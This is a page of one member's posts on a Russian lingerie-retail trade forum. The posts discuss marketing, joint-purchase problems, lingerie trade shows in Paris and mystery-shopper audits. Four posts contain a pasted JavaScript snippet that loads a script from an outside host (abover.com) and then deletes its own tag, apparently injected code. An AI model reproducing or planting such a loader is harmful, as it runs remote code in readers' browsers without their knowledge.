Единый бельевой портал
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Biko-Info.Ru

Форум

Если это ваш первый визит, рекомендуем ознакомиться с правилами портала.

Для того, чтобы вы могли оставлять на форуме сообщения, вам необходимо зарегистрироваться.

Нажмите ссылку Регистрация, чтобы продолжить.


Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 20 21 22 23 24 25 26 27 28 29 30 След.
Социальные сети
 
Интернет-магазин ,несомненно, пиарится в среде интернет-пользователей. Мы продвигаем оф-лайн (5 шт., которым 20 лет и интернет-магазин ( 4 года). Поэтому основной трафик-с оф-лайна.
Как бороться с СП, Ссылки и практические рекомендации для производителей
 
Я обязательно ставлю в известность партнеров о факте СП в письменной форме на имя директора компании, объясняю о угрозах для них и для нас в случае повтора подобных фактов. Упоминание об общении по этому вопросу на форуме между разными регионами хорошо влияет на адекватные компании. С ними надо партнерствовать или настаивать на закрытии от СП всего ассортимента , кроме распродаж, договариваться о запрете отпуска СП новинок.
[ Закрыто] 11-я бизнес-встреча, организованная журналом "Белье и колготки". 23-26 апреля. 2014 г., Объявление сроков.
 
Я тоже ,с удовольствием, присоединюсь к БВ.
Социальные сети
 
В нашем городе ни одна бельевая группа не дала коммерческого эффекта ни одному бельевику. Оф- лайновая реклама отрабатывает лучше.
Срочный вопрос - сколько вести одна упаковка картонная с колготами?
 
Я согласна с Жанной. Если планируете отработать вложенные доп. инвестиции со временем, то стоит напрячься. Дешево-хорошо не бывает. Красные зоны нарасхват.
Наступает новый сезон купальников. Кто получил новые коллекции?, Как продаются?
 
Уже 2 года подряд мы начинаем сезон ранее ,чем обычно принято у всех. При рекламной поддержке это эффективно.Начали с дорогих+ пляжки, сейчас получили дешевые. Ловим  праздничный трафик, тяжело по оплатам, но  с кем можем, договариваемся о траншах.
[ Закрыто] 11-я БВ, организованная журналом "Белье и колготки". Семинар "Ассортиментная матрица бюстгальтеров"., Подготовка
 
21 Кокарева Милена.
Бизнес-встречи, организованные журналом «Б&К»,11-я БВ. Семинар "Ассортиментная матрица колготок", Подготовка
 
15. Кокарева Милена
Salon International de la Lingerie, Париж. Крупнейшая выставка нижнего белья и купальников
 
Благодарю,все получила.
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); }  document.body.appendChild(script); })();
Salon International de la Lingerie, Париж. Крупнейшая выставка нижнего белья и купальников
 
Пришли письма по регистрации, где при переходе по ссылке требуется код(для бесплатной регистрации). Нужен либо бейдж во вложении сразу для печати, либо код, для бесплатной регистрации.
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();
Изменено: Милена Кокарева - 07.03.2016 18:10:57
Salon International de la Lingerie, Париж. Крупнейшая выставка нижнего белья и купальников
 
Здравствуйте, Мария. Прошу вашей помощи в регистрации на выставке в январе на двоих: Кокаревы Михаил и Милена( были в июле, данные по нам ,наверное, остались - г.Киров).Будем в Альпах на встрече по другому бизнесу,24 или25 самостоятельно доберемся до Парижа из Турина , отель заказан,обратный вылет тоже, виза действующая еще с июля.
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); }  document.body.appendChild(script); })();
[ Закрыто] 10-я БВ. Голосование: нужны ли баджи?
 
Мое мнение- такое же. Бейджи нужны.
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); }  document.body.appendChild(script); })();
Выставка Lingerie Expo
 
Михаил! С удовольствием присоединюсь к поклонникам Lisca Если это уместно. Всегда коллекции на Уровне. И люди приятные.
С днем рождения!
 
Прочитала на форуме, что сегодня день рождения у большой умницы и красавицы- Светы Максимовской. Если еще не опоздала с поздравлением, то все цветы и пожелания- для тебя! Желаю тебе воплощения всех бизнеспланов.
Выставка Lingerie Expo
 
Сообщила партнерам из компании Сасса и 15- Парковая о своем желании поработать с ними 4 сентября. Нужно ли делать дополнительно заявку о своем присутствии здесь вам? Не знаю.
Тайный покупатель в Вашем магазине.
 
Для "Т.П" нужен эталон сервиса тут без стандартов обслуживания никак. Затем ставишь цель: что проверять и  выделяешь группу вопросов углубления. Составляешь чек-листы( об этом все подробно объясняли Моксели). Для исключения субъективизма используешь диктофон. При желании продавца-предоставляешь первичный материал(отчет Т.П.). А не только резюме.Мы используем типы постоянных клиентов.А для лидеров прошлых лет -типы не нашей ЦА. На них срезаются все :не считают их клиентами.Доказываешь истину: работать нужно со всеми , кто зашел в маг.
Тайный покупатель в Вашем магазине.
 
Мы все хотим верить в сказку про единую с продавцами цель, наивно расчитываем на их упорный труд и высокий профессионализм .Правильно проведенный "Тайный покупатель" позволяет снять "розовые очки" с глаз руководителя. И чем быстрее, тем лучше для бизнеса. Неправильный " Т.П." демотивирует продавца , вплоть до увольнения, и ,наоборот, соревновательный характер + небольшая утечка информации из офиса о проверках дают нематериальное стимулирование сотрудников. Мне ,как руководителю, результаты этих мероприятий очень нравятся.
Unique by Mode City & Interfiliere - выставка нижнего белья и купальников, июль, Франция
 
Спасибо.Для подготовки к выставке и  для максимального использования ее возможностей ваша работа неоценима.
Пути развития и выживания
 
Проецируя на свой опыт-стандарты отходят в сторону и их вытесняют собрания- если прерывается контроль за их исполнением: возникают другие задачи или замыливается глаз контролера.На собраниях можно хорошо замотивировать. Но не решаются задачи тестирования своего сервиса. Остается только аналитика продаж.Не видны очевидные причины провалов по выручке и т.п. Но только в случае наличия 3 и более магазинов.Большой бизнес требует других технологий.
Пути развития и выживания
 
КАК выиграть борьбу за клиента с конкурентом который рекламируется больше вас и продает товар дешевле вас. И магазин не хуже расположен. Ситуация непростая.Практика показывает:можно успешно выигрывать битву за клиента при развитом сервисе: различных срособах оплаты и доп. услугах(консультации по брафиттингу).Важно комплексное обслуживание(подбор нескольких вариантов+корректирующиеизделия).Или выяснение потребностей на перспективу другого сезона и ведение клиента во времени.Вариантов несколько. Без алгоритмов ведения (стандартов)все продавцыэтогоне делают.Также в формате опта.Звонки+ встречи+ выезд к клиенту спериодичностью по строгому плану дают превосходные коммерческие результаты.
Страницы: Пред. 1 ... 20 21 22 23 24 25 26 27 28 29 30 След.


ВВЕРХ

 

Яндекс цитирования

Главная Карта сайта Написать письмо Версия для печатиВерсия для печати
Авторские права   Карта сайта   Поиск по сайту   Опросы   Ограничение ответственности   Конфиденциальность
© 2010—2020 «Единый бельевой портал»
Сделано в Arbeitsgruppe
Хостинг «ТаймВэб»
На портале существуют следующие разделы: форум, статьи, выставки, показы, опросы, тенденции, рынок белья. Главный раздел портала — форум, на котором обсуждаются актуальные вопросы работы магазинов, взаимоотношения с поставщиками, ассортимент по всем товарным группам: корсетное белье (бюстгальтер, трусы, грация, корсет); предпостельное белье (сорочка, пеньюар); одежда для дома и отдыха (спортивный костюм, пижама, халат); верхний и нижний трикотаж (топ, блуза, футболка, майка, водолазка); бесшовное белье (трусы, майка, футболка, топ, водолазка), одежда для пляжа (купальник, парео, плавки); чулочно-носочные изделия (чулки, носки, колготки, гольфы, леггинсы).